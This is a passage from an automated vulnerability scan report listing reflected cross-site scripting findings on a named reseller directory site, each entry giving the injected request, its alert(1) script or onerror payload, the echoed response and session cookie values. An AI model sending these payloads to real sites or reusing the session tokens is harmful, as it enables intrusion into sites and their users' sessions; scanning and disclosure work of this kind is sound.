Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domain names25ebc<img src=a onerror=alert(1)>115a8b38d8442b0a1]</td>
...[SNIP]...

2.4246. http://www.resellerbase.com/tag/domains [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domains

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c95a3<script>alert(1)</script>9f262bdf37c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagc95a3<script>alert(1)</script>9f262bdf37c/domains HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc95a3<script>alert(1)</script>9f262bdf37c/domains was not found on this server.</p>
...[SNIP]...

2.4247. http://www.resellerbase.com/tag/domains [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domains

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32a8b<script>alert(1)</script>1bf9a392d2e3594ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag32a8b<script>alert(1)</script>1bf9a392d2e3594ca/domains?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domains
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag32a8b<script>alert(1)</script>1bf9a392d2e3594ca/domains?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4248. http://www.resellerbase.com/tag/domains [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domains

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 73f38</title><img%20src%3da%20onerror%3dalert(1)>47dddb5e290424c01 was submitted in the REST URL parameter 2. This input was echoed as 73f38</title><img src=a onerror=alert(1)>47dddb5e290424c01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domains73f38</title><img%20src%3da%20onerror%3dalert(1)>47dddb5e290424c01?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domains
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domains73f38</title><img src=a onerror=alert(1)>47dddb5e290424c01</title>
...[SNIP]...

2.4249. http://www.resellerbase.com/tag/domains [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domains

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbec2<img%20src%3da%20onerror%3dalert(1)>b71ea305362 was submitted in the REST URL parameter 2. This input was echoed as bbec2<img src=a onerror=alert(1)>b71ea305362 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domainsbbec2<img%20src%3da%20onerror%3dalert(1)>b71ea305362 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domainsbbec2<img src=a onerror=alert(1)>b71ea305362]</td>
...[SNIP]...

2.4250. http://www.resellerbase.com/tag/domains [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domains

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a11ac</title><img%20src%3da%20onerror%3dalert(1)>13508ca6bb3 was submitted in the REST URL parameter 2. This input was echoed as a11ac</title><img src=a onerror=alert(1)>13508ca6bb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domainsa11ac</title><img%20src%3da%20onerror%3dalert(1)>13508ca6bb3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domainsa11ac</title><img src=a onerror=alert(1)>13508ca6bb3</title>
...[SNIP]...

2.4251. http://www.resellerbase.com/tag/domains [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domains

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d2c8<img%20src%3da%20onerror%3dalert(1)>3abe119967d4f7e4c was submitted in the REST URL parameter 2. This input was echoed as 9d2c8<img src=a onerror=alert(1)>3abe119967d4f7e4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domains9d2c8<img%20src%3da%20onerror%3dalert(1)>3abe119967d4f7e4c?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domains
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domains9d2c8<img src=a onerror=alert(1)>3abe119967d4f7e4c]</td>
...[SNIP]...

2.4252. http://www.resellerbase.com/tag/downtime+monitor [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/downtime+monitor

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 129e9<script>alert(1)</script>3fe638e6cd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag129e9<script>alert(1)</script>3fe638e6cd2/downtime+monitor HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag129e9<script>alert(1)</script>3fe638e6cd2/downtime+monitor was not found on this server.</p>
...[SNIP]...

2.4253. http://www.resellerbase.com/tag/dripship [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dripship

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30b5d<script>alert(1)</script>da86059d89d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag30b5d<script>alert(1)</script>da86059d89d/dripship HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag30b5d<script>alert(1)</script>da86059d89d/dripship was not found on this server.</p>
...[SNIP]...

2.4254. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dropshipper

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a34b<script>alert(1)</script>b36cc29cdc694bc6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag6a34b<script>alert(1)</script>b36cc29cdc694bc6b/dropshipper?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag6a34b<script>alert(1)</script>b36cc29cdc694bc6b/dropshipper?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4255. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dropshipper

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a65db<script>alert(1)</script>0231df521ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga65db<script>alert(1)</script>0231df521ef/dropshipper HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga65db<script>alert(1)</script>0231df521ef/dropshipper was not found on this server.</p>
...[SNIP]...

2.4256. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dropshipper

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 202db</title><img%20src%3da%20onerror%3dalert(1)>5571f593535b262a was submitted in the REST URL parameter 2. This input was echoed as 202db</title><img src=a onerror=alert(1)>5571f593535b262a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/dropshipper202db</title><img%20src%3da%20onerror%3dalert(1)>5571f593535b262a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: dropshipper202db</title><img src=a onerror=alert(1)>5571f593535b262a</title>
...[SNIP]...

2.4257. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dropshipper

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42668<img%20src%3da%20onerror%3dalert(1)>fdd22197fb41d3b6b was submitted in the REST URL parameter 2. This input was echoed as 42668<img src=a onerror=alert(1)>fdd22197fb41d3b6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/dropshipper42668<img%20src%3da%20onerror%3dalert(1)>fdd22197fb41d3b6b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: drops
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : dropshipper42668<img src=a onerror=alert(1)>fdd22197fb41d3b6b]</td>
...[SNIP]...

2.4258. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dropshipper

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 110b0</title><img%20src%3da%20onerror%3dalert(1)>3ba171cd952 was submitted in the REST URL parameter 2. This input was echoed as 110b0</title><img src=a onerror=alert(1)>3ba171cd952 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/dropshipper110b0</title><img%20src%3da%20onerror%3dalert(1)>3ba171cd952 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: dropshipper110b0</title><img src=a onerror=alert(1)>3ba171cd952</title>
...[SNIP]...

2.4259. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dropshipper

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cafd1<img%20src%3da%20onerror%3dalert(1)>0b7215ed52d was submitted in the REST URL parameter 2. This input was echoed as cafd1<img src=a onerror=alert(1)>0b7215ed52d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/dropshippercafd1<img%20src%3da%20onerror%3dalert(1)>0b7215ed52d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: drops
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : dropshippercafd1<img src=a onerror=alert(1)>0b7215ed52d]</td>
...[SNIP]...

2.4260. http://www.resellerbase.com/tag/dropshipping [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dropshipping

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab6d0<script>alert(1)</script>05bce2dae9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagab6d0<script>alert(1)</script>05bce2dae9c/dropshipping HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagab6d0<script>alert(1)</script>05bce2dae9c/dropshipping was not found on this server.</p>
...[SNIP]...

2.4261. http://www.resellerbase.com/tag/eBook [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/eBook

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c874<script>alert(1)</script>4cd9ac1d94e8854dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag4c874<script>alert(1)</script>4cd9ac1d94e8854dd/eBook?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/eBook
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4c874<script>alert(1)</script>4cd9ac1d94e8854dd/eBook?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4262. http://www.resellerbase.com/tag/eBook [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/eBook

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 40774<script>alert(1)</script>166a755a9a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag40774<script>alert(1)</script>166a755a9a2/eBook HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag40774<script>alert(1)</script>166a755a9a2/eBook was not found on this server.</p>
...[SNIP]...

2.4263. http://www.resellerbase.com/tag/eBook [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/eBook

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a978<img%20src%3da%20onerror%3dalert(1)>3a5fd0d9b1b was submitted in the REST URL parameter 2. This input was echoed as 5a978<img src=a onerror=alert(1)>3a5fd0d9b1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/eBook5a978<img%20src%3da%20onerror%3dalert(1)>3a5fd0d9b1b HTTP/1.1
